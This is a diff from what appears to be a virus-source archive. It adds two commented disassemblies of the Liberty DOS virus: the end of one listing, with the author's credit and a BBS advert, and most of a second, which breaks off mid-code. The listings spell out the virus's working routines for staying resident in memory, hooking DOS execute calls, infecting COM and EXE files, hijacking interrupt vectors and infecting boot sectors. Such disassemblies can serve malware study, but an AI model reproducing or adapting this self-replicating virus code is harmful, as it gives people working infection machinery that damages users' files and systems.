PTR [0B47],FF +CS:0ACB 90 NOP +CS:0ACC 2E CS: +CS:0ACD C606950BFF MOV BYTE PTR [0B95],FF +CS:0AD2 90 NOP +CS:0AD3 2E CS: +CS:0AD4 C606080CFF MOV BYTE PTR [0C08],FF +CS:0AD9 90 NOP +CS:0ADA 2E CS: +CS:0ADB C706940A0000 MOV WORD PTR [0A94],0000 +CS:0AE1 2E CS: +CS:0AE2 FF06960A INC WORD PTR [0A96] +CS:0AE6 EBA4 JMP 0A8C +CS:0AE8 A14000 MOV AX,[0040] +CS:0AEB 2E CS: +CS:0AEC A3430B MOV [0B43],AX +CS:0AEF A14200 MOV AX,[0042] +CS:0AF2 2E CS: +CS:0AF3 A3450B MOV [0B45],AX +CS:0AF6 B8360B MOV AX,0B36 +CS:0AF9 FA CLI +CS:0AFA A34000 MOV [0040],AX +CS:0AFD 8C0E4200 MOV [0042],CS +CS:0B01 C3 RET +CS:0B02 FA CLI +CS:0B03 A15000 MOV AX,[0050] +CS:0B06 2E CS: +CS:0B07 A3910B MOV [0B91],AX +CS:0B0A A15200 MOV AX,[0052] +CS:0B0D 2E CS: +CS:0B0E A3930B MOV [0B93],AX +CS:0B11 B8840B MOV AX,0B84 +CS:0B14 A35000 MOV [0050],AX +CS:0B17 8C0E5200 MOV [0052],CS +CS:0B1B C3 RET +CS:0B1C FA CLI +CS:0B1D A15C00 MOV AX,[005C] +CS:0B20 2E CS: +CS:0B21 A3040C MOV [0C04],AX +CS:0B24 A15E00 MOV AX,[005E] +CS:0B27 2E CS: +CS:0B28 A3060C MOV [0C06],AX +CS:0B2B B8FC0B MOV AX,0BFC +CS:0B2E A35C00 MOV [005C],AX +CS:0B31 8C0E5E00 MOV [005E],CS +CS:0B35 C3 RET +; +; Now the gadgets' routines. When activated, only the word MAGIC!! will be +; sent to screen, port, and printer. +; +CS:0B36 9C PUSHF ; Screen +CS:0B37 80FC09 CMP AH,09 +CS:0B3A 740F JZ 0B4B +CS:0B3C 80FC0A CMP AH,0A +CS:0B3F 740A JZ 0B4B +CS:0B41 9D POPF +CS:0B42 EA00000000 JMP 0000:0000 +CS:0B4B 2E CS: +CS:0B4C 803E470BFF CMP BYTE PTR [0B47],FF +CS:0B51 74EE JZ 0B41 +CS:0B53 53 PUSH BX +CS:0B54 56 PUSH SI +CS:0B55 50 PUSH AX +CS:0B56 33DB XOR BX,BX +CS:0B58 2E CS: +CS:0B59 833E480B07 CMP WORD PTR [0B48],+07 +CS:0B5E 7507 JNZ 0B67 +CS:0B60 2E CS: +CS:0B61 C706480B0000 MOV WORD PTR [0B48],0000 +CS:0B67 2E CS: +CS:0B68 8B1E480B MOV BX,[0B48] +CS:0B6C 2E CS: +CS:0B6D 8B3E480B MOV DI,[0B48] +CS:0B71 47 INC DI +CS:0B72 2E CS: +CS:0B73 893E480B MOV [0B48],DI +CS:0B77 BE3B0C MOV SI,0C3B +CS:0B7A 58 POP AX +CS:0B7B 2E CS: +CS:0B7C 8A00 MOV AL,[BX+SI] +CS:0B7E FEC0 INC AL +CS:0B80 5E POP SI +CS:0B81 5B POP BX +CS:0B82 EBBD JMP 0B41 +CS:0B84 9C PUSHF ; Port +CS:0B85 80FC01 CMP AH,01 +CS:0B88 740D JZ 0B97 +CS:0B8A 80FC02 CMP AH,02 +CS:0B8D 7436 JZ 0BC5 +CS:0B8F 9D POPF +CS:0B90 EA00000000 JMP 0000:0000 +CS:0B97 2E CS: +CS:0B98 803E950BFF CMP BYTE PTR [0B95],FF +CS:0B9D 74F0 JZ 0B8F +CS:0B9F 53 PUSH BX +CS:0BA0 56 PUSH SI +CS:0BA1 33DB XOR BX,BX +CS:0BA3 2E CS: +CS:0BA4 8A1E960B MOV BL,[0B96] +CS:0BA8 BE3B0C MOV SI,0C3B +CS:0BAB 2E CS: +CS:0BAC 8A00 MOV AL,[BX+SI] +CS:0BAE 2E CS: +CS:0BAF FE06960B INC BYTE PTR [0B96] +CS:0BB3 2E CS: +CS:0BB4 803E960B07 CMP BYTE PTR [0B96],07 +CS:0BB9 7506 JNZ 0BC1 +CS:0BBB 2E CS: +CS:0BBC C606960B00 MOV BYTE PTR [0B96],00 +CS:0BC1 5E POP SI +CS:0BC2 5B POP BX +CS:0BC3 EBCA JMP 0B8F +CS:0BC5 2E CS: +CS:0BC6 803E950BFF CMP BYTE PTR [0B95],FF +CS:0BCB 74C2 JZ 0B8F +CS:0BCD 2E CS: +CS:0BCE FF1E910B CALL FAR [0B91] +CS:0BD2 80FC00 CMP AH,00 +CS:0BD5 7F24 JG 0BFB +CS:0BD7 53 PUSH BX +CS:0BD8 56 PUSH SI +CS:0BD9 33DB XOR BX,BX +CS:0BDB 2E CS: +CS:0BDC 8A1E960B MOV BL,[0B96] +CS:0BE0 BE3B0C MOV SI,0C3B +CS:0BE3 2E CS: +CS:0BE4 8A00 MOV AL,[BX+SI] +CS:0BE6 2E CS: +CS:0BE7 FE06960B INC BYTE PTR [0B96] +CS:0BEB 2E CS: +CS:0BEC 803E960B07 CMP BYTE PTR [0B96],07 +CS:0BF1 7506 JNZ 0BF9 +CS:0BF3 2E CS: +CS:0BF4 C606960B00 MOV BYTE PTR [0B96],00 +CS:0BF9 5E POP SI +CS:0BFA 5B POP BX +CS:0BFB CF IRET +CS:0BFC 9C PUSHF ; Printer +CS:0BFD 80FC00 CMP AH,00 +CS:0C00 7407 JZ 0C09 +CS:0C02 9D POPF +CS:0C03 EA00000000 JMP 0000:0000 +CS:0C09 2E CS: +CS:0C0A 803E080CFF CMP BYTE PTR [0C08],FF +CS:0C0F 74F1 JZ 0C02 +CS:0C11 53 PUSH BX +CS:0C12 56 PUSH SI +CS:0C13 33DB XOR BX,BX +CS:0C15 2E CS: +CS:0C16 8A1E3A0C MOV BL,[0C3A] +CS:0C1A BE3B0C MOV SI,0C3B +CS:0C1D 2E CS: +CS:0C1E 8A00 MOV AL,[BX+SI] +CS:0C20 FEC0 INC AL +CS:0C22 2E CS: +CS:0C23 FE063A0C INC BYTE PTR [0C3A] +CS:0C27 2E CS: +CS:0C28 803E3A0C07 CMP BYTE PTR [0C3A],07 +CS:0C2D 7507 JNZ 0C36 +CS:0C2F 2E CS: +CS:0C30 C6063A0C00 MOV BYTE PTR [0C3A],00 +CS:0C35 90 NOP +CS:0C36 5E POP SI +CS:0C37 5B POP BX +CS:0C38 EBC8 JMP 0C02 +; +; The encrypted text 'MAGIC!!' +; +DS:0C3A 4C 40 46 48 42 20 20 +; +; Important note: +; When there is no longer space on the disk to infect a file, the Liberty +; virus will infect the bootsector. This is done in the 'OHIO' way. +; +; +; +; End of Liberty (2867) disassembly. (c) 1991 by Remco van Helvoort. +; This document may be freely shared. If you have any comments or some +; nice little viruses for analysis, feel free to drop me a note. +; +; Remco van Helvoort +; Bredastraat 3 +; 5224 VD 's-Hertogenbosch +; Holland +; + +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + diff --git a/MSDOS/Virus.MSDOS.Unknown.libertyb.asm b/MSDOS/Virus.MSDOS.Unknown.libertyb.asm new file mode 100644 index 00000000..ad39d293 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.libertyb.asm @@ -0,0 +1,1194 @@ +CS:0110 EB79 JMP 018B +CS:0112 90 NOP +; +; The program's original infomation is stored between these sections +; +CS:018B 2E CS: +CS:018C 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ? +CS:0191 7403 JZ 0196 +CS:0193 1F POP DS +CS:0194 59 POP CX +CS:0195 5B POP BX +CS:0196 50 PUSH AX +CS:0197 53 PUSH BX +CS:0198 51 PUSH CX +CS:0199 52 PUSH DX +CS:019A 1E PUSH DS +CS:019B 06 PUSH ES +CS:019C 1E PUSH DS +CS:019D 0E PUSH CS +CS:019E 1F POP DS +CS:019F E8CD00 CALL 026F ; Installation check +CS:01A2 3DFFFF CMP AX,FFFF +CS:01A5 741A JZ 01C1 +CS:01A7 E8D700 CALL 0281 ; Get vector 21h +CS:01AA 07 POP ES +CS:01AB 06 PUSH ES +CS:01AC 8CC0 MOV AX,ES +CS:01AE 48 DEC AX +CS:01AF 8ED8 MOV DS,AX +CS:01B1 E8DC00 CALL 0290 ; Adjust MCB +CS:01B4 8EC0 MOV ES,AX +CS:01B6 0E PUSH CS +CS:01B7 1F POP DS +CS:01B8 E8EC00 CALL 02A7 ; Move to Upper Memory +CS:01BB E8F400 CALL 02B2 ; Set vector 21h +CS:01BE E80101 CALL 02C2 ; Set installation flag +CS:01C1 2E CS: +CS:01C2 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ? +CS:01C7 7417 JZ 01E0 +CS:01C9 07 POP ES +CS:01CA 0E PUSH CS +CS:01CB 1F POP DS +CS:01CC E80901 CALL 02D8 ; Decrypt header +CS:01CF E81901 CALL 02EB ; Restore header +CS:01D2 07 POP ES +CS:01D3 1F POP DS +CS:01D4 5A POP DX +CS:01D5 59 POP CX +CS:01D6 5B POP BX +CS:01D7 58 POP AX +CS:01D8 1E PUSH DS +CS:01D9 BF0001 MOV DI,0100 +CS:01DC 57 PUSH DI +CS:01DD 33FF XOR DI,DI +CS:01DF CB RETF ; Start file +CS:01E0 FA CLI +CS:01E1 5E POP SI +CS:01E2 07 POP ES +CS:01E3 1F POP DS +CS:01E4 5A POP DX +CS:01E5 59 POP CX +CS:01E6 5B POP BX +CS:01E7 58 POP AX +CS:01E8 2E CS: +CS:01E9 8B3E2C06 MOV DI,[062C] +CS:01ED 03FE ADD DI,SI +CS:01EF 8ED7 MOV SS,DI +CS:01F1 2E CS: +CS:01F2 8B3E2E06 MOV DI,[062E] +CS:01F6 8BE7 MOV SP,DI ; Restore stack +CS:01F8 2E CS: +CS:01F9 8B3E2806 MOV DI,[0628] +CS:01FD 03FE ADD DI,SI +CS:01FF 57 PUSH DI +CS:0200 2E CS: +CS:0201 FF362A06 PUSH [062A] +CS:0205 33F6 XOR SI,SI +CS:0207 EBD4 JMP 01DD ; Start file +; +; The encrypted Liberty header for .COM files +; +DS:0200 1D 69 D9 00 01 01 +DS:0210 80 80 40 40 20 20 10 10-08 08 A4 05 D2 04 C9 02 +DS:0220 4C 81 A8 40 49 20 21 90-0B 48 E8 69 95 05 4A 92 +DS:0230 21 1D 40 A8 43 28 90 14-4E 4C 07 27 D3 22 81 81 +DS:0240 C0 B0 40 C4 79 20 90 29-5C D0 AE 69 57 35 2B 9A +DS:0250 31 CD 34 40 51 53 AE 5D-62 C0 E3 C1 B0 35 58 F6 +DS:0260 46 E5 20 02 +; +; Various subroutines used by the virus +; +CS:026F 2E CS: +CS:0270 8A1E6A02 MOV BL,[026A] +CS:0274 32FF XOR BH,BH +CS:0276 33C0 XOR AX,AX +CS:0278 8ED8 MOV DS,AX +CS:027A D1E3 SHL BX,1 +CS:027C D1E3 SHL BX,1 +CS:027E 8B07 MOV AX,[BX] +CS:0280 C3 RET +CS:0281 A18400 MOV AX,[0084] +CS:0284 2E CS: +CS:0285 A38C03 MOV [038C],AX +CS:0288 A18600 MOV AX,[0086] +CS:028B 2E CS: +CS:028C A38E03 MOV [038E],AX +CS:028F C3 RET +CS:0290 BB4221 MOV BX,2142 +CS:0293 B104 MOV CL,04 +CS:0295 D3EB SHR BX,CL +CS:0297 291E0300 SUB [0003],BX +CS:029B A10300 MOV AX,[0003] +CS:029E 03060100 ADD AX,[0001] +CS:02A2 A31200 MOV [0012],AX +CS:02A5 40 INC AX +CS:02A6 C3 RET +CS:02A7 BF1001 MOV DI,0110 +CS:02AA 8BF7 MOV SI,DI +CS:02AC B99A05 MOV CX,059A +CS:02AF F3 REPZ +CS:02B0 A5 MOVSW +CS:02B1 C3 RET +CS:02B2 33C0 XOR AX,AX +CS:02B4 8ED8 MOV DS,AX +CS:02B6 FA CLI +CS:02B7 B86C03 MOV AX,036C +CS:02BA A38400 MOV [0084],AX +CS:02BD 8C068600 MOV [0086],ES +CS:02C1 C3 RET +CS:02C2 FA CLI +CS:02C3 B8FFFF MOV AX,FFFF +CS:02C6 2E CS: +CS:02C7 8A1E6A02 MOV BL,[026A] +CS:02CB 32FF XOR BH,BH +CS:02CD D1E3 SHL BX,1 +CS:02CF D1E3 SHL BX,1 +CS:02D1 8907 MOV [BX],AX +CS:02D3 40 INC AX +CS:02D4 894702 MOV [BX+02],AX +CS:02D7 C3 RET +CS:02D8 B93C00 MOV CX,003C +CS:02DB BE1301 MOV SI,0113 +CS:02DE 2E CS: +CS:02DF 8B14 MOV DX,[SI] +CS:02E1 D3CA ROR DX,CL +CS:02E3 2E CS: +CS:02E4 8914 MOV [SI],DX +CS:02E6 46 INC SI +CS:02E7 46 INC SI +CS:02E8 E2F4 LOOP 02DE +CS:02EA C3 RET +CS:02EB BF0001 MOV DI,0100 +CS:02EE BE1301 MOV SI,0113 +CS:02F1 B93C00 MOV CX,003C +CS:02F4 F3 REPZ +CS:02F5 A5 MOVSW +CS:02F6 C3 RET +; +; I am not sure what the next routine is supposed to be doing. +; +CS:02F7 9C PUSHF +CS:02F8 2E CS: +CS:02F9 803E100301 CMP BYTE PTR [0310],01 +CS:02FE 740A JZ 030A +CS:0300 80FC03 CMP AH,03 +CS:0303 7505 JNZ 030A +CS:0305 80FA80 CMP DL,80 +CS:0308 7207 JB 0311 +CS:030A 9D POPF +CS:030B EA00000000 JMP 0000:0000 +CS:0311 06 PUSH ES +CS:0312 0E PUSH CS +CS:0313 07 POP ES +CS:0314 B80902 MOV AX,0209 +CS:0317 BB420C MOV BX,0C42 +CS:031A B90100 MOV CX,0001 +CS:031D 9C PUSHF +CS:031E 2E CS: +CS:031F FF1E0C03 CALL FAR [030C] +CS:0323 72E5 JB 030A +CS:0325 B80905 MOV AX,0509 +CS:0328 BB4803 MOV BX,0348 +CS:032B B93100 MOV CX,0031 +CS:032E 9C PUSHF +CS:032F 2E CS: +CS:0330 FF1E0C03 CALL FAR [030C] +CS:0334 72D4 JB 030A +CS:0336 B80903 MOV AX,0309 +CS:0339 BB420C MOV BX,0C42 +CS:033C B93100 MOV CX,0031 +CS:033F 9C PUSHF +CS:0340 2E CS: +CS:0341 FF1E0C03 CALL FAR [030C] +CS:0345 07 POP ES +CS:0346 9D POPF +CS:0347 CF IRET +; +; Another format table used by the virus +; +DS:0340 00 00 31 02 00 00 32 02 +DS:0350 00 00 33 02 00 00 34 02-00 00 35 02 00 00 36 02 +DS:0360 00 00 37 02 00 00 38 02-00 00 39 02 +; +; The virus infects files by monitoring function 4Bh of vector 21h +; +CS:036C 9C PUSHF +CS:036D 3D004B CMP AX,4B00 ; Execute function ? +CS:0370 741E JZ 0390 +CS:0372 EB16 JMP 038A +CS:0374 90 NOP +CS:0375 E8B901 CALL 0531 ; Close file +CS:0378 E89A00 CALL 0415 ; Restore vectors +CS:037B C6060C04FF MOV BYTE PTR [040C],FF +CS:0380 90 NOP +CS:0381 9D POPF +CS:0382 07 POP ES +CS:0383 1F POP DS +CS:0384 5F POP DI +CS:0385 5E POP SI +CS:0386 5A POP DX +CS:0387 59 POP CX +CS:0388 5B POP BX +CS:0389 58 POP AX +CS:038A 9D POPF +CS:038B EA77142C02 JMP 022C:1477 ; Continue +CS:0390 50 PUSH AX +CS:0391 53 PUSH BX +CS:0392 51 PUSH CX +CS:0393 52 PUSH DX +CS:0394 56 PUSH SI +CS:0395 57 PUSH DI +CS:0396 1E PUSH DS +CS:0397 06 PUSH ES +CS:0398 9C PUSHF +CS:0399 E8A600 CALL 0442 ; Set error vectors +CS:039C E8E100 CALL 0480 ; Open file +CS:039F 72D4 JB 0375 +CS:03A1 0E PUSH CS +CS:03A2 1F POP DS +CS:03A3 0E PUSH CS +CS:03A4 07 POP ES +CS:03A5 A30A04 MOV [040A],AX +CS:03A8 93 XCHG BX,AX +CS:03A9 C6060C0401 MOV BYTE PTR [040C],01 +CS:03AE 90 NOP +CS:03AF E8D800 CALL 048A ; Read file header +CS:03B2 72C1 JB 0375 +CS:03B4 BB1301 MOV BX,0113 +CS:03B7 2E CS: +CS:03B8 813F4D5A CMP WORD PTR [BX],5A4D ; .EXE file ? +CS:03BC 7505 JNZ 03C3 +CS:03BE E8C001 CALL 0581 ; Adapt header +CS:03C1 EBB2 JMP 0375 +CS:03C3 2E CS: +CS:03C4 C606090200 MOV BYTE PTR [0209],00 ; Set switch +CS:03C9 E8CD00 CALL 0499 ; Check infection +CS:03CC 74A7 JZ 0375 +CS:03CE E8DD00 CALL 04AE ; Encrypt header +CS:03D1 E8EB00 CALL 04BF ; Move to EOF +CS:03D4 729F JB 0375 +CS:03D6 83FA00 CMP DX,+00 ; +CS:03D9 759A JNZ 0375 ; +CS:03DB 3D0005 CMP AX,0500 ; +CS:03DE 7295 JB 0375 ; +CS:03E0 3DFFEF CMP AX,EFFF ; +CS:03E3 7390 JNB 0375 ; Check file size +CS:03E5 E8EA00 CALL 04D2 ; Move to next paragraph +CS:03E8 728B JB 0375 +CS:03EA E80701 CALL 04F4 ; Write virus +CS:03ED 7286 JB 0375 +CS:03EF 3BC1 CMP AX,CX +CS:03F1 7C11 JL 0404 +CS:03F3 E81301 CALL 0509 ; Move to BOF +CS:03F6 7209 JB 0401 +CS:03F8 E86201 CALL 055D ; Decrypt Libery header +CS:03FB E81E01 CALL 051C ; Write Liberty header +CS:03FE E86F01 CALL 0570 ; Encrypt Liberty Header +CS:0401 E971FF JMP 0375 +CS:0404 E83801 CALL 053F ; Set & get vector 13h +CS:0407 E96BFF JMP 0375 +; +; Revectoring of error vectors. +; +CS:0415 1E PUSH DS +CS:0416 33DB XOR BX,BX +CS:0418 8EDB MOV DS,BX +CS:041A FA CLI +CS:041B 2E CS: +CS:041C 8B1E0D04 MOV BX,[040D] +CS:0420 891E8C00 MOV [008C],BX +CS:0424 2E CS: +CS:0425 8B1E0F04 MOV BX,[040F] +CS:0429 891E8E00 MOV [008E],BX +CS:042D FA CLI +CS:042E 2E CS: +CS:042F 8B1E1104 MOV BX,[0411] +CS:0433 891E9000 MOV [0090],BX +CS:0437 2E CS: +CS:0438 8B1E1304 MOV BX,[0413] +CS:043C 891E8E00 MOV [008E],BX +CS:0440 1F POP DS +CS:0441 C3 RET +CS:0442 1E PUSH DS +CS:0443 33DB XOR BX,BX +CS:0445 8EDB MOV DS,BX +CS:0447 8B1E8C00 MOV BX,[008C] +CS:044B 2E CS: +CS:044C 891E0D04 MOV [040D],BX +CS:0450 8B1E8E00 MOV BX,[008E] +CS:0454 2E CS: +CS:0455 891E0F04 MOV [040F],BX +CS:0459 FA CLI +CS:045A BB3106 MOV BX,0631 +CS:045D 891E8C00 MOV [008C],BX +CS:0461 8C0E8E00 MOV [008E],CS +CS:0465 8B1E9000 MOV BX,[0090] +CS:0469 2E CS: +CS:046A 891E1104 MOV [0411],BX +CS:046E 8B1E9200 MOV BX,[0092] +CS:0472 FA CLI +CS:0473 BB3206 MOV BX,0632 +CS:0476 891E9000 MOV [0090],BX +CS:047A 8C0E9200 MOV [0092],CS +CS:047E 1F POP DS +CS:047F C3 RET +; +; Various subroutines used by the virus +; +CS:0480 B8023D MOV AX,3D02 +CS:0483 9C PUSHF +CS:0484 2E CS: +CS:0485 FF1E8C03 CALL FAR [038C] +CS:0489 C3 RET +CS:048A B43F MOV AH,3F +CS:048C B97800 MOV CX,0078 +CS:048F BA1301 MOV DX,0113 +CS:0492 9C PUSHF +CS:0493 2E CS: +CS:0494 FF1E8C03 CALL FAR [038C] +CS:0498 C3 RET +CS:0499 BF1301 MOV DI,0113 +CS:049C 81C76802 ADD DI,0268 +CS:04A0 81EF0A02 SUB DI,020A +CS:04A4 BE6802 MOV SI,0268 +CS:04A7 FC CLD +CS:04A8 B90700 MOV CX,0007 +CS:04AB F3 REPZ +CS:04AC A6 CMPSB +CS:04AD C3 RET +CS:04AE B93C00 MOV CX,003C +CS:04B1 BE1301 MOV SI,0113 +CS:04B4 8B14 MOV DX,[SI] +CS:04B6 D3C2 ROL DX,CL +CS:04B8 8914 MOV [SI],DX +CS:04BA 46 INC SI +CS:04BB 46 INC SI +CS:04BC E2F6 LOOP 04B4 +CS:04BE C3 RET +CS:04BF B80242 MOV AX,4202 +CS:04C2 2E CS: +CS:04C3 8B1E0A04 MOV BX,[040A] +CS:04C7 33C9 XOR CX,CX +CS:04C9 33D2 XOR DX,DX +CS:04CB 9C PUSHF +CS:04CC 2E CS: +CS:04CD FF1E8C03 CALL FAR [038C] +CS:04D1 C3 RET +CS:04D2 B90400 MOV CX,0004 +CS:04D5 D3E8 SHR AX,CL +CS:04D7 BB6602 MOV BX,0266 +CS:04DA 8907 MOV [BX],AX +CS:04DC 40 INC AX +CS:04DD B90400 MOV CX,0004 +CS:04E0 D3E0 SHL AX,CL +CS:04E2 92 XCHG DX,AX +CS:04E3 33C9 XOR CX,CX +CS:04E5 B80042 MOV AX,4200 +CS:04E8 2E CS: +CS:04E9 8B1E0A04 MOV BX,[040A] +CS:04ED 9C PUSHF +CS:04EE 2E CS: +CS:04EF FF1E8C03 CALL FAR [038C] +CS:04F3 C3 RET +CS:04F4 B9330B MOV CX,0B33 +CS:04F7 B80040 MOV AX,4000 +CS:04FA BA1001 MOV DX,0110 +CS:04FD 2E CS: +CS:04FE 8B1E0A04 MOV BX,[040A] +CS:0502 9C PUSHF +CS:0503 2E CS: +CS:0504 FF1E8C03 CALL FAR [038C] +CS:0508 C3 RET +CS:0509 B80042 MOV AX,4200 +CS:050C 2E CS: +CS:050D 8B1E0A04 MOV BX,[040A] +CS:0511 33C9 XOR CX,CX +CS:0513 33D2 XOR DX,DX +CS:0515 9C PUSHF +CS:0516 2E CS: +CS:0517 FF1E8C03 CALL FAR [038C] +CS:051B C3 RET +CS:051C BA0A02 MOV DX,020A +CS:051F B80040 MOV AX,4000 +CS:0522 2E CS: +CS:0523 8B1E0A04 MOV BX,[040A] +CS:0527 B97800 MOV CX,0078 +CS:052A 9C PUSHF +CS:052B 2E CS: +CS:052C FF1E8C03 CALL FAR [038C] +CS:0530 C3 RET +CS:0531 B43E MOV AH,3E +CS:0533 2E CS: +CS:0534 8B1E0A04 MOV BX,[040A] +CS:0538 9C PUSHF +CS:0539 2E CS: +CS:053A FF1E8C03 CALL FAR [038C] +CS:053E C3 RET +CS:053F 33C0 XOR AX,AX +CS:0541 8ED8 MOV DS,AX +CS:0543 FA CLI +CS:0544 A14C00 MOV AX,[004C] +CS:0547 2E CS: +CS:0548 A31407 MOV [0714],AX +CS:054B A14E00 MOV AX,[004E] +CS:054E 2E CS: +CS:054F A31607 MOV [0716],AX +CS:0552 B8F906 MOV AX,06F9 +CS:0555 A34C00 MOV [004C],AX +CS:0558 8C0E4E00 MOV [004E],CS +CS:055C C3 RET +; +; Header encrypting +; +CS:055D B92D00 MOV CX,002D +CS:0560 BE0A02 MOV SI,020A +CS:0563 2E CS: +CS:0564 8B3C MOV DI,[SI] +CS:0566 D3CF ROR DI,CL +CS:0568 2E CS: +CS:0569 893C MOV [SI],DI +CS:056B 46 INC SI +CS:056C 46 INC SI +CS:056D E2F4 LOOP 0563 +CS:056F C3 RET +CS:0570 BE0A02 MOV SI,020A +CS:0573 B92D00 MOV CX,002D +CS:0576 8B3C MOV DI,[SI] +CS:0578 D3C7 ROL DI,CL +CS:057A 893C MOV [SI],DI +CS:057C 46 INC SI +CS:057D 46 INC SI +CS:057E E2F6 LOOP 0576 +CS:0580 C3 RET +; +; .EXE file handling +; +CS:0581 8B7F02 MOV DI,[BX+02] +CS:0584 83FFFF CMP DI,-01 ; Check infection +CS:0587 7439 JZ 05C2 +CS:0589 8B7F16 MOV DI,[BX+16] +CS:058C 83C710 ADD DI,+10 +CS:058F 893E2806 MOV [0628],DI +CS:0593 8B7F14 MOV DI,[BX+14] +CS:0596 893E2A06 MOV [062A],DI +CS:059A 8B7F0E MOV DI,[BX+0E] +CS:059D 83C710 ADD DI,+10 +CS:05A0 893E2C06 MOV [062C],DI +CS:05A4 8B7F10 MOV DI,[BX+10] +CS:05A7 893E2E06 MOV [062E],DI +CS:05AB BF1001 MOV DI,0110 +CS:05AE 897F14 MOV [BX+14],DI ; Set IP +CS:05B1 BF420D MOV DI,0D42 +CS:05B4 897F10 MOV [BX+10],DI ; Set SP +CS:05B7 2E CS: +CS:05B8 C606090201 MOV BYTE PTR [0209],01 ; Set switch +CS:05BD E8FFFE CALL 04BF ; Move to EOF +CS:05C0 7301 JNB 05C3 +CS:05C2 C3 RET +CS:05C3 83FA0A CMP DX,+0A ; +CS:05C6 77FA JA 05C2 ; Check file size +CS:05C8 B104 MOV CL,04 +CS:05CA D3E8 SHR AX,CL +CS:05CC 40 INC AX +CS:05CD 3D0010 CMP AX,1000 +CS:05D0 7501 JNZ 05D3 +CS:05D2 42 INC DX +CS:05D3 D3E0 SHL AX,CL +CS:05D5 50 PUSH AX +CS:05D6 52 PUSH DX +CS:05D7 B91000 MOV CX,0010 +CS:05DA F7F1 DIV CX +CS:05DC BB1301 MOV BX,0113 +CS:05DF 2D1100 SUB AX,0011 +CS:05E2 8B7F08 MOV DI,[BX+08] +CS:05E5 2BC7 SUB AX,DI +CS:05E7 894716 MOV [BX+16],AX ; Set CodeSegment +CS:05EA 89470E MOV [BX+0E],AX ; Set StackSegment +CS:05ED 59 POP CX +CS:05EE 5A POP DX +CS:05EF E8F3FE CALL 04E5 ; Move to next paragraph +CS:05F2 722F JB 0623 +CS:05F4 E8FDFE CALL 04F4 ; Write virus +CS:05F7 722A JB 0623 +CS:05F9 3BC1 CMP AX,CX +CS:05FB 7C27 JL 0624 +CS:05FD E8BFFE CALL 04BF ; Move to BOF +CS:0600 7221 JB 0623 +CS:0602 B90002 MOV CX,0200 +CS:0605 F7F1 DIV CX +CS:0607 83FA00 CMP DX,+00 +CS:060A 7401 JZ 060D +CS:060C 40 INC AX +CS:060D BB1301 MOV BX,0113 +CS:0610 894704 MOV [BX+04],AX ; Set blocks +CS:0613 C74702FFFF MOV WORD PTR [BX+02],FFFF ; Set infection mark +CS:0618 E8EEFE CALL 0509 ; Move to BOF +CS:061B 7206 JB 0623 +CS:061D BA1301 MOV DX,0113 +CS:0620 E8FCFE CALL 051F ; Write header +CS:0623 C3 RET +CS:0624 E818FF CALL 053F ; Set & get vector 13h +CS:0627 C3 RET +; +; Error vectors +; +CS:0631 CF IRET ; Error vector 23h +CS:0632 32C0 XOR AL,AL ; +CS:0634 CF IRET ; Error vector 24h +; +; The next part is the virus's bootsector +; +CS:0635 EB01 JMP 0638 +CS:0637 90 NOP +CS:0638 33C0 XOR AX,AX +CS:063A 8ED0 MOV SS,AX +CS:063C BC007C MOV SP,7C00 +CS:063F 33C0 XOR AX,AX +CS:0641 8EC0 MOV ES,AX +CS:0643 BB1304 MOV BX,0413 ; +CS:0646 26 ES: ; +CS:0647 8B07 MOV AX,[BX] ; +CS:0649 2D0A00 SUB AX,000A ; +CS:064C B106 MOV CL,06 ; +CS:064E 26 ES: ; +CS:064F 8907 MOV [BX],AX ; Decrease memory +CS:0651 D3E0 SHL AX,CL +CS:0653 8EC0 MOV ES,AX +CS:0655 B80802 MOV AX,0208 ; +CS:0658 BB1001 MOV BX,0110 ; +CS:065B B93128 MOV CX,2831 ; +CS:065E 33D2 XOR DX,DX ; +CS:0660 CD13 INT 13 ; Read virus +CS:0662 06 PUSH ES +CS:0663 BB6806 MOV BX,0668 +CS:0666 53 PUSH BX +CS:0667 CB RETF +CS:0668 2E CS: +CS:0669 803EC8060A CMP BYTE PTR [06C8],0A +CS:066E 7446 JZ 06B6 +CS:0670 33C0 XOR AX,AX +CS:0672 8ED8 MOV DS,AX +CS:0674 2E CS: +CS:0675 FE06C806 INC BYTE PTR [06C8] +CS:0679 B80803 MOV AX,0308 +CS:067C BB1001 MOV BX,0110 +CS:067F B93128 MOV CX,2831 +CS:0682 33D2 XOR DX,DX +CS:0684 CD13 INT 13 +CS:0686 E85200 CALL 06DB ; Set & get vector 13h +CS:0689 2E CS: ; +CS:068A C606470BFF MOV BYTE PTR [0B47],FF ; +CS:068F 90 NOP ; +CS:0690 2E CS: ; +CS:0691 C606950BFF MOV BYTE PTR [0B95],FF ; +CS:0696 90 NOP ; +CS:0697 2E CS: ; +CS:0698 C606080CFF MOV BYTE PTR [0C08],FF ; Switches off +CS:069D 90 NOP +CS:069E E82902 CALL 08CA ; Set & get vector 8h +CS:06A1 E85402 CALL 08F8 ; Set & get vector 1Ch +CS:06A4 E84104 CALL 0AE8 ; Set & get vector 10h +CS:06A7 E85804 CALL 0B02 ; Set & get vector 14h +CS:06AA E86F04 CALL 0B1C ; Set & get vector 17h +CS:06AD E81900 CALL 06C9 ; Read original bootsector +CS:06B0 BB007C MOV BX,7C00 ; +CS:06B3 1E PUSH DS ; +CS:06B4 53 PUSH BX ; +CS:06B5 CB RETF ; Start +CS:06B6 E81000 CALL 06C9 ; Read bootsector +CS:06B9 B80103 MOV AX,0301 +CS:06BC BB007C MOV BX,7C00 